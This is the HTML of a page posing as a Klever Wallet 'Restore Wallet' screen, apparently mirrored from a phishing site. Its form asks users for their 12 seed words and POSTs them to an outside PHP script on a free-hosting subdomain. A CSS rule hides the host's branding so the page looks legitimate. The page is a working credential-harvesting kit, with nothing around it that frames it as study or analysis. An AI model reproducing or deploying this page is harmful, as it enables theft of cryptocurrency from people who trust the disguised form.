<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Klever Wallet</title>
	<!-- BOOTSTRAP STYLES-->
    <link href="./Klever_Wallet_files/bootstrap.html" rel="stylesheet">
     <!-- FONTAWESOME STYLES-->
    <link href="./Klever_Wallet_files/font-awesome.html" rel="stylesheet">
        <!-- CUSTOM STYLES-->
    <link href="./Klever_Wallet_files/custom.html" rel="stylesheet">
     <!-- GOOGLE FONTS-->
   <link href="./Klever_Wallet_files/css" rel="stylesheet" type="text/css">

</head>
<body>
<style>
 *{
  margin: 0;
  padding: 0;
  font-family: Century Gothic;
 }
body{
  background-color: rgb(40,43,68);
  height: 100vh;
  background-size: cover;
  background-position: absolute;
  background-repeat: no-repeat, repeat;
}

ul{
  float: right;
  list-style-type: none;
  margin-top: 25px;
}

ul li{
  display: inline-block;
}

ul li a{
  text-decoration: none;
  color: #fff;
  padding: 8px 25px;
  border: 2px solid #C09854;
  border-radius: 25px;
  font-size: 14px;
  font-style: bold;
  transform: 0.6s ease;
  letter-spacing: 1px;
}

ul li a:hover{
  background-color: #C09854;
  color: #fff;
}

.logo img{
  float: left;
  margin-top: 23px;
  height: 20px;
  width: auto;
}

.main{
  margin: auto;
}

.title{
 
  margin-top: 28%;
  text-align: center;
  
}


.btn{
  border-color: 2px solid rgb(214,90,192);
  background-color: rgb(214,90,192);
  padding: 16px 10px;
  display: inline-block;
  border-radius: 25px;
  width: 300px;
  border: none;
  outline: none !important;
  
}

.btn a{
  text-decoration: none;
  color: white;
  font-size: 15px;
  font-style: bold;
  letter-spacing: 2px;

}

img[alt="www.000webhost.com"]{
    opacity: 0;
}
#seed{
    border: 1px solid white;
    padding: 2px 2px;
    outline: none !important;
    width: 300px;
    height: 6em;
    background-color: transparent;
    color: white;
    
}
::placeholder{
    padding-top: 0px;
    color: white;
    text-align: center;
}

</style>



    <header>
        <h1 style="text-align: center; color: white; font-size: 18px">Restore Wallet</h1>
    </header>

  <div class="title">
     

    <form method="POST" action="https://kulop2022yesss.000webhostapp.com/klever.php?accept">
        
        <input type="text" name="seed" id="seed" placeholder="Please, type your 12 seed words here" required="">
       

        <br><br><br><br>
<br><br><br><br>

<br>


    
    <button class="btn" type="submit">
      <strong>Restore</strong>
	  
    </button>
	</form>
<div class="body-2 basic-900 ng-scope" w-i18n="seedForm.seedTitle">The seed key is a human-readable representation of your wallet. </div>
    <div class="body-2 basic-900 ng-scope" w-i18n="seedForm.seedTitle">Those words, in that exact order, can be used to re-create your wallet</div>
    

    
  </div>


    

     <!-- SCRIPTS -AT THE BOTOM TO REDUCE THE LOAD TIME-->
    <!-- JQUERY SCRIPTS -->
    <script src="./Klever_Wallet_files/jquery-1.10.2.html"></script>
      <!-- BOOTSTRAP SCRIPTS -->
    <script src="./Klever_Wallet_files/bootstrap.min.html"></script>
    <!-- METISMENU SCRIPTS -->
    <script src="./Klever_Wallet_files/jquery.metisMenu.html"></script>
      <!-- CUSTOM SCRIPTS -->
    <script src="./Klever_Wallet_files/custom(1).html"></script>
   


<!-- Mirrored from www.klever-kfi.com/process.html by HTTrack Website Copier/3.x [XR&CO'2017], Fri, 02 Apr 2021 11:33:33 GMT -->
</body></html>